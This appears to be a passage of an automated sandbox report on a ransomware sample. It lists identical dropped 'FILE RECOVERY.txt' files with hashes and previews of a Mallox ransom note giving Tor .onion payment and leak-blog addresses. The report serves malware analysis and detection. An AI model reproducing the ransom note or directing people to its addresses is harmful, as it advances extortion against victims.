                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\StagedAssets\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\202914\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280810\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280811\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280815\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\310091\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338388\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\338389\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\353698\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000045\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000161\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000163\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000165\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
